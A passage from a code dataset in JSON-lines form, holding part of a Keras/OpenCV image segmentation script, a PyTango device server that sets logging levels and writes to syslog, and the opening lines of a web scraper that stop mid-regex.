legend_img.shape[1]] = np.copy(legend_img)\r\n out_img[:seg_img.shape[0], legend_img.shape[1]:] = np.copy(seg_img)\r\n\r\n return out_img\r\n\r\n\r\ndef visualize_segmentation(seg_arr, inp_img=None, n_classes=None,\r\n colors=class_colors, class_names=None,\r\n overlay_img=False, show_legends=False,\r\n prediction_width=None, prediction_height=None):\r\n\r\n if n_classes is None:\r\n n_classes = np.max(seg_arr)\r\n\r\n seg_img = get_colored_segmentation_image(seg_arr, n_classes, colors=colors)\r\n\r\n if inp_img is not None:\r\n original_h = inp_img.shape[0]\r\n original_w = inp_img.shape[1]\r\n seg_img = cv2.resize(seg_img, (original_w, original_h), interpolation=cv2.INTER_NEAREST)\r\n\r\n if (prediction_height is not None) and (prediction_width is not None):\r\n seg_img = cv2.resize(seg_img, (prediction_width, prediction_height), interpolation=cv2.INTER_NEAREST)\r\n if inp_img is not None:\r\n inp_img = cv2.resize(inp_img,\r\n (prediction_width, prediction_height))\r\n\r\n if overlay_img:\r\n assert inp_img is not None\r\n seg_img = overlay_seg_image(inp_img, seg_img)\r\n\r\n if show_legends:\r\n assert class_names is not None\r\n legend_img = get_legends(class_names, colors=colors)\r\n\r\n seg_img = concat_lenends(seg_img, legend_img)\r\n\r\n return seg_img\r\n\r\n\r\ndef get_image_array(image_input,\r\n width, height,\r\n imgNorm=\"sub_mean\", ordering='channels_first', read_image_type=1):\r\n \"\"\" Load image array from input \"\"\"\r\n\r\n if type(image_input) is np.ndarray:\r\n # It is already an array, use it as it is\r\n img = image_input\r\n elif isinstance(image_input, six.string_types):\r\n if not os.path.isfile(image_input):\r\n raise DataLoaderError(\"get_image_array: path {0} doesn't exist\"\r\n .format(image_input))\r\n img = cv2.imread(image_input, read_image_type)\r\n else:\r\n raise DataLoaderError(\"get_image_array: Can't process input type {0}\"\r\n .format(str(type(image_input))))\r\n\r\n if imgNorm == \"sub_and_divide\":\r\n img = 
np.float32(cv2.resize(img, (width, height))) / 127.5 - 1\r\n elif imgNorm == \"sub_mean\":\r\n img = cv2.resize(img, (width, height))\r\n img = img.astype(np.float32)\r\n img = np.atleast_3d(img)\r\n\r\n means = [103.939, 116.779, 123.68]\r\n\r\n for i in range(min(img.shape[2], len(means))):\r\n img[:, :, i] -= means[i]\r\n\r\n img = img[:, :, ::-1]\r\n elif imgNorm == \"divide\":\r\n img = cv2.resize(img, (width, height))\r\n img = img.astype(np.float32)\r\n img = img/255.0\r\n\r\n if ordering == 'channels_first':\r\n img = np.rollaxis(img, 2, 0)\r\n return img\r\n\r\n\r\n\r\ndef predict(model=None, inp=None, out_fname=None,\r\n checkpoints_path=None, overlay_img=False,\r\n class_names=None, show_legends=False, colors=class_colors,\r\n prediction_width=None, prediction_height=None,\r\n read_image_type=1):\r\n\r\n if model is None and (checkpoints_path is not None):\r\n model = model_from_checkpoint_path(checkpoints_path)\r\n\r\n assert (inp is not None)\r\n assert ((type(inp) is np.ndarray) or isinstance(inp, six.string_types)),\\\r\n \"Input should be the CV image or the input file name\"\r\n\r\n if isinstance(inp, six.string_types):\r\n inp = cv2.imread(inp, read_image_type)\r\n\r\n assert (len(inp.shape) == 3 or len(inp.shape) == 1 or len(inp.shape) == 4), \"Image should be h,w,3 \"\r\n\r\n output_width = 256\r\n output_height = 128\r\n input_width = 512\r\n input_height = 256\r\n n_classes = 8\r\n\r\n x = get_image_array(inp, input_width, input_height,\r\n ordering=IMAGE_ORDERING)\r\n pr = model.predict(np.array([x]))[0]\r\n pr = pr.reshape((output_height, output_width, n_classes)).argmax(axis=2)\r\n\r\n seg_img = visualize_segmentation(pr, inp, n_classes=n_classes,\r\n colors=colors, overlay_img=overlay_img,\r\n show_legends=show_legends,\r\n class_names=class_names,\r\n prediction_width=prediction_width,\r\n prediction_height=prediction_height)\r\n\r\n if out_fname is not None:\r\n cv2.imwrite(out_fname, seg_img)\r\n\r\n return pr\r\n\r\n\r\n\r\n\r\ndef 
init_model():\r\n mobilenet_seg ='./assets'\r\n model = tf.keras.models.load_model(mobilenet_seg)\r\n return model\r\n\r\n\t\r\ndef inference(image, model):\r\n im = cv2.imread(image)\r\n prediction = o= predict(model, inp=image ,out_fname=\"./tmp/out.png\", overlay_img=True, show_legends=True, class_names = [ \"void\", \"flat\", \"construction\",\"object\", \"nature\", \"sky\", \"human\", \"vehicle\"])\r\n return prediction\r\n","sub_path":"segmentor.py","file_name":"segmentor.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140234762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Sending Device server which is logged by ElementLogger and CentralLogger\"\"\"\nimport sys\nimport time\nimport logging\nimport logging.handlers\nimport syslog\nfrom logging.handlers import SysLogHandler\nfrom PyTango import AttrQuality, AttrWriteType, DispLevel, DevState, DebugIt, Database, DbDevInfo, DeviceProxy\nfrom PyTango.server import Device, DeviceMeta, attribute, command, run, device_property\n\nlogger = logging.getLogger(\"Sending\")\nsyslog = SysLogHandler(address='/dev/log', facility='user')\nformatter = logging.Formatter('%(name)s: %(levelname)s %(module)s %(message)r')\nsyslog.setFormatter(formatter)\nlogger.addHandler(syslog)\n\n\"\"\"Sending Device server class\"\"\"\nclass Sending(Device):\n __metaclass__ = DeviceMeta\n\n \"\"\"Attributes for setting logging levels for element storage and central\"\"\"\n elementLoggingLevel = attribute(label=\"ElementLogginglevel\", dtype=int,\n fget=\"get_elementLoggingLevel\",\n fset=\"set_elementLoggingLevel\",\n doc=\"Sets element logging level\")\n\n storageLoggingLevel = attribute(label=\"StorgeLoggingLevel\", dtype=int,\n fget=\"get_storageLoggingLevel\",\n fset=\"set_storageLoggingLevel\",\n doc=\"Sets syslog logging level\")\n\n centralLoggingLevel = attribute(label=\"CentralLoggingLevel\", dtype=int,\n 
fget=\"get_centralLoggingLevel\",\n fset=\"set_centralLoggingLevel\",\n doc=\"Sets Central logging level\")\n\n def init_device(self):\n Device.init_device(self)\n self.set_state(DevState.STANDBY)\n self.__elementLoggingLevel = 5 \n self.__storageLoggingLevel = 5 \n self.__centralLoggingLevel = 5 \n logger.setLevel(logging.DEBUG)\n\n def get_elementLoggingLevel(self):\n return self.__elementLoggingLevel\n\n def set_elementLoggingLevel(self, elementLoggingLevel):\n self.__elementLoggingLevel = elementLoggingLevel\n return elementLoggingLevel\n\n def get_centralLoggingLevel(self):\n return self.__centralLoggingLevel\n\n def set_centralLoggingLevel(self, centralLoggingLevel):\n self.__centralLoggingLevel = centralLoggingLevel\n return centralLoggingLevel\n\n def get_storageLoggingLevel(self):\n return self.__storageLoggingLevel\n\n def set_storageLoggingLevel(self, storageLoggingLevel):\n self.debug_stream(\"In set_StorageLogginglevel\")\n self.__storageLoggingLevel = storageLoggingLevel\n\n if self.__storageLoggingLevel == 1:\n logger.setLevel(logging.FATAL)\n elif self.__storageLoggingLevel == 2:\n logger.setLevel(logging.ERROR)\n elif self.__storageLoggingLevel == 3:\n logger.setLevel(logging.WARNING)\n elif self.__storageLoggingLevel == 4:\n logger.setLevel(logging.INFO)\n elif self.__storageLoggingLevel == 5:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.DEBUG)\n return storageLoggingLevel\n\n @command\n def TurnOn(self):\n # turn on the sending device.\n self.set_state(DevState.ON)\n self.debug_stream(\"TurnOn Sending DEBUG\")\n self.info_stream(\"TurnOn Sending INFO\")\n self.warn_stream(\"TurnOn Sending WARNING\")\n self.error_stream(\"TurnOn Sending ERROR\")\n self.fatal_stream(\"TurnOn Sending FATAL\")\n\n logger.debug(\"TurnOn Sending debug\")\n logger.info(\"TurnOn Sending info\")\n logger.warning(\"TurnOn Sending warn\")\n logger.error(\"TurnOn Sending error\")\n logger.fatal(\"TurnOn Sending fatal\")\n\n @command\n def 
TurnOff(self):\n # turn off the sending device\n self.set_state(DevState.OFF)\n self.debug_stream(\"TurnOff Sending DEBUG\")\n self.info_stream(\"TurnOff Sending INFO\")\n self.warn_stream(\"TurnOff Sending WARNING\")\n self.error_stream(\"TurnOff Sending ERROR\")\n self.fatal_stream(\"TurnOff Sending FATAL\")\n\n logger.debug(\"TurnOff Sending debug\")\n logger.info(\"TurnOff Sending info\")\n logger.warning(\"TurnOff Sending warn\")\n logger.error(\"TurnOff Sending error\")\n logger.fatal(\"TurnOff Sending fatal\")\n\nrun([Sending])\n","sub_path":"sandbox/logging/Sending.py","file_name":"Sending.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509647434","text":"# coding:utf-8\n# python3 tdmp.py\n# I should stop on \"CutTrack\" for a while\n\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport jsonpickle\nimport re\nimport os\n\nglobal proxyurl\ndownload_template = \"https://trashbox.ru/files20/\"\nregex = r\"(